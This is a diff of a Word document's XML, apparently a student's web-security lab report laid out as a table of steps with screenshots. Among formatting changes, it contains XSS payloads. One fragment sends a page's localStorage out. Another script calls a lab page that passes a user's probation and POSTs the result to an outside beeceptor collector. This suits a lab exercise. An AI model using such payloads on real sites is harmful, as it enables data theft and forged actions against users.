-              </w:rPr>
-              <w:t xml:space="preserve"> +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>localStorage</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>JSON.stringify</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>localStorage</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>));</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhttp.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t xml:space="preserve">  xhttp.send();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15384,7 +13571,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2787" w:type="dxa"/>
+            <w:tcW w:w="4204" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -15456,15 +13643,13 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:noProof/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16F510E5" wp14:editId="5DD08099">
-                  <wp:extent cx="1638300" cy="780807"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
-                  <wp:docPr id="4" name="Picture 4"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70A4AA2C" wp14:editId="78214BF2">
+                  <wp:extent cx="2532380" cy="1165860"/>
+                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+                  <wp:docPr id="12" name="Picture 12"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -15472,17 +13657,11 @@
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="4" name="Picture 4"/>
+                          <pic:cNvPr id="1" name=""/>
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId19" cstate="print">
-                            <a:extLst>
-                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                              </a:ext>
-                            </a:extLst>
-                          </a:blip>
+                          <a:blip r:embed="rId19"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -15490,7 +13669,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="1665991" cy="794005"/>
+                            <a:ext cx="2532380" cy="1165860"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -15528,7 +13707,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5386" w:type="dxa"/>
+            <w:tcW w:w="3969" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -15543,7 +13722,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2787" w:type="dxa"/>
+            <w:tcW w:w="4204" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -15579,14 +13758,13 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:noProof/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63B9977E" wp14:editId="112394C3">
-                  <wp:extent cx="1666875" cy="566394"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
-                  <wp:docPr id="5" name="Picture 5"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="129BFC3B" wp14:editId="05282D77">
+                  <wp:extent cx="2532380" cy="1056005"/>
+                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+                  <wp:docPr id="10" name="Picture 10"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -15594,7 +13772,7 @@
                     <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                         <pic:nvPicPr>
-                          <pic:cNvPr id="5" name="Picture 5"/>
+                          <pic:cNvPr id="1" name=""/>
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
@@ -15606,7 +13784,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="1741200" cy="591649"/>
+                            <a:ext cx="2532380" cy="1056005"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -15698,13 +13876,14 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>3</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5386" w:type="dxa"/>
+            <w:tcW w:w="3969" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -15715,7 +13894,6 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15732,9 +13910,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>!--</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve">!-- </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15742,6 +13919,147 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:t>xss</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>_1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  xhr.onload = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    var xhr2 = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.send("test=" +</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
@@ -15751,17 +14069,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xss</w:t>
-            </w:r>
-            <w:r>
+              <w:t>this.responseText);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>_1</w:t>
-            </w:r>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15769,7 +14088,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>.html --&gt;</w:t>
+              <w:t xml:space="preserve">  };</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15788,7 +14107,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;script&gt;</w:t>
+              <w:t xml:space="preserve">  xhr.open("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15807,320 +14126,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.onload</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = function () {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.send("test=" +</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t xml:space="preserve">  xhr.send();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -16155,7 +14161,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2787" w:type="dxa"/>
+            <w:tcW w:w="4204" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -16167,7 +14173,6 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>Submit</w:t>
             </w:r>
             <w:r>
@@ -16192,7 +14197,6 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>W</w:t>
             </w:r>
             <w:r>
@@ -16223,21 +14227,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>the user “</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xiandew</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>”</w:t>
+              <w:t>the user “xiandew”</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16300,9 +14290,9 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="190E6CE6" wp14:editId="02A1EF28">
-                  <wp:extent cx="1679663" cy="435907"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="190E6CE6" wp14:editId="51343DF8">
+                  <wp:extent cx="2579645" cy="669471"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                   <wp:docPr id="6" name="Picture 6"/>
                   <wp:cNvGraphicFramePr>
